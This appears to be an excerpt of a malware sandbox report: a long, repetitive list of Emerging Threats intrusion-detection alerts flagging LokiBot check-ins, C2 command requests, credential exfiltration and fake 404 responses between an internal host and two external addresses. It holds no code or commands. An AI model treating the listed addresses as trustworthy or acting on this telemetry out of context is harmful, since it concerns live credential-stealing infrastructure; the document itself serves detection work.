Timestamp:	192.168.2.3188.114.97.349745802024313 08/11/22-06:42:16.160936
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349742802024317 08/11/22-06:42:12.661275
SID:	2024317
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349823802025381 08/11/22-06:43:13.321407
SID:	2025381
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349895802021641 08/11/22-06:44:06.157277
SID:	2021641
Source Port:	49895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349896802025381 08/11/22-06:44:07.789189
SID:	2025381
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349754802024313 08/11/22-06:42:26.308314
SID:	2024313
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349843802024313 08/11/22-06:43:31.924022
SID:	2024313
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349748802024318 08/11/22-06:42:19.613257
SID:	2024318
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349792802021641 08/11/22-06:42:59.404301
SID:	2021641
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349887802024318 08/11/22-06:43:58.405291
SID:	2024318
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349884802021641 08/11/22-06:43:54.330408
SID:	2021641
Source Port:	49884
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349885802025381 08/11/22-06:43:55.376397
SID:	2025381
Source Port:	49885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349760802825766 08/11/22-06:42:32.923604
SID:	2825766
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349774802825766 08/11/22-06:42:44.099150
SID:	2825766
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349800802021641 08/11/22-06:43:08.046752
SID:	2021641
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349879802025381 08/11/22-06:43:48.403290
SID:	2025381
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349817802025381 08/11/22-06:43:11.901228
SID:	2025381
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349780802825766 08/11/22-06:42:49.154690
SID:	2825766
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349759802825766 08/11/22-06:42:31.695874
SID:	2825766
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349761802021641 08/11/22-06:42:34.002289
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349788802024313 08/11/22-06:42:54.331478
SID:	2024313
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349747802025381 08/11/22-06:42:18.537201
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349791802024313 08/11/22-06:42:58.117986
SID:	2024313
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349882802021641 08/11/22-06:43:51.663595
SID:	2021641
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349897802825766 08/11/22-06:44:08.828123
SID:	2825766
Source Port:	49897
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349800802825766 08/11/22-06:43:08.046752
SID:	2825766
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349853802024318 08/11/22-06:43:40.660156
SID:	2024318
Source Port:	49853
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349793802021641 08/11/22-06:43:00.645450
SID:	2021641
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349744802024318 08/11/22-06:42:15.052087
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349791802024318 08/11/22-06:42:58.117986
SID:	2024318
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349794802025381 08/11/22-06:43:01.964847
SID:	2025381
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349881802024318 08/11/22-06:43:50.015660
SID:	2024318
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349793802825766 08/11/22-06:43:00.645450
SID:	2825766
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349828802024313 08/11/22-06:43:14.503252
SID:	2024313
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349882802825766 08/11/22-06:43:51.663595
SID:	2825766
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349881802024313 08/11/22-06:43:50.015660
SID:	2024313
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349883802025381 08/11/22-06:43:53.308240
SID:	2025381
Source Port:	49883
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349746802825766 08/11/22-06:42:17.452589
SID:	2825766
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349780802021641 08/11/22-06:42:49.154690
SID:	2021641
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349751802024318 08/11/22-06:42:22.964431
SID:	2024318
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349753802025381 08/11/22-06:42:25.207102
SID:	2025381
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349828802024318 08/11/22-06:43:14.503252
SID:	2024318
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349840802024318 08/11/22-06:43:28.505356
SID:	2024318
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349745802024318 08/11/22-06:42:16.160936
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349751802024313 08/11/22-06:42:22.964431
SID:	2024313
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349786802024318 08/11/22-06:42:53.219319
SID:	2024318
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349840802024313 08/11/22-06:43:28.505356
SID:	2024313
Source Port:	49840
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349875802024318 08/11/22-06:43:47.334573
SID:	2024318
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349898802021641 08/11/22-06:44:09.907279
SID:	2021641
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349774802021641 08/11/22-06:42:44.099150
SID:	2021641
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349879802024313 08/11/22-06:43:48.403290
SID:	2024313
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349763802025381 08/11/22-06:42:39.324991
SID:	2025381
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349875802024313 08/11/22-06:43:47.334573
SID:	2024313
Source Port:	49875
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349811802021641 08/11/22-06:43:10.662100
SID:	2021641
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349780802024313 08/11/22-06:42:49.154690
SID:	2024313
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349879802024318 08/11/22-06:43:48.403290
SID:	2024318
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349752802025381 08/11/22-06:42:24.044623
SID:	2025381
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349789802021641 08/11/22-06:42:55.412963
SID:	2021641
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349780802024318 08/11/22-06:42:49.154690
SID:	2024318
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349762802024313 08/11/22-06:42:35.961537
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349762802024318 08/11/22-06:42:35.961537
SID:	2024318
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349777802825766 08/11/22-06:42:45.276948
SID:	2825766
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349745802025381 08/11/22-06:42:16.160936
SID:	2025381
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349843802025381 08/11/22-06:43:31.924022
SID:	2025381
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349749802825766 08/11/22-06:42:20.745320
SID:	2825766
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349832802024313 08/11/22-06:43:19.747801
SID:	2024313
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349745802825766 08/11/22-06:42:16.160936
SID:	2825766
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349897802024313 08/11/22-06:44:08.828123
SID:	2024313
Source Port:	49897
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349749802025381 08/11/22-06:42:20.745320
SID:	2025381
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349778802025381 08/11/22-06:42:46.945645
SID:	2025381
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349843802825766 08/11/22-06:43:31.924022
SID:	2825766
Source Port:	49843
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349746802021641 08/11/22-06:42:17.452589
SID:	2021641
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349752802825766 08/11/22-06:42:24.044623
SID:	2825766
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349756802024313 08/11/22-06:42:28.447484
SID:	2024313
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 188.114.96.3 - Destination IP: 192.168.2.3

Timestamp:	188.114.96.3192.168.2.380497882025483 08/11/22-06:42:54.430865
SID:	2025483
Source Port:	80
Destination Port:	49788
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349800802025381 08/11/22-06:43:08.046752
SID:	2025381
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349850802024318 08/11/22-06:43:33.879385
SID:	2024318
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349790802024313 08/11/22-06:42:56.651534
SID:	2024313
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349850802024313 08/11/22-06:43:33.879385
SID:	2024313
Source Port:	49850
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349777802025381 08/11/22-06:42:45.276948
SID:	2025381
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349796802025381 08/11/22-06:43:04.193279
SID:	2025381
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349867802024318 08/11/22-06:43:45.824252
SID:	2024318
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349790802024318 08/11/22-06:42:56.651534
SID:	2024318
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349859802021641 08/11/22-06:43:42.759258
SID:	2021641
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349896802825766 08/11/22-06:44:07.789189
SID:	2825766
Source Port:	49896
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349832802024318 08/11/22-06:43:19.747801
SID:	2024318
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349795802024318 08/11/22-06:43:03.020333
SID:	2024318
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349890802021641 08/11/22-06:44:03.457387
SID:	2021641
Source Port:	49890
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349760802025381 08/11/22-06:42:32.923604
SID:	2025381
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349795802024313 08/11/22-06:43:03.020333
SID:	2024313
Source Port:	49795
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.96.3

Timestamp:	192.168.2.3188.114.96.349887802024313 08/11/22-06:43:58.405291
SID:	2024313
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349759802024318 08/11/22-06:42:31.695874
SID:	2024318
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349754802024318 08/11/22-06:42:26.308314
SID:	2024318
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349778802825766 08/11/22-06:42:46.945645
SID:	2825766
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 188.114.96.3 - Destination IP: 192.168.2.3

Timestamp:	188.114.96.3192.168.2.380498852025483 08/11/22-06:43:55.477446
SID:	2025483
Source Port:	80
Destination Port:	49885
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349796802825766 08/11/22-06:43:04.193279
SID:	2825766
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349742802024312 08/11/22-06:42:12.661275
SID:	2024312
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349759802024313 08/11/22-06:42:31.695874
SID:	2024313
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349898802024318 08/11/22-06:44:09.907279
SID:	2024318
Source Port:	49898
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349748802021641 08/11/22-06:42:19.613257
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.3 - Destination IP: 188.114.97.3

Timestamp:	192.168.2.3188.114.97.349895802024318 08/11/22-06:44:06.157277
SID:	2024318
Source Port:	49895
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

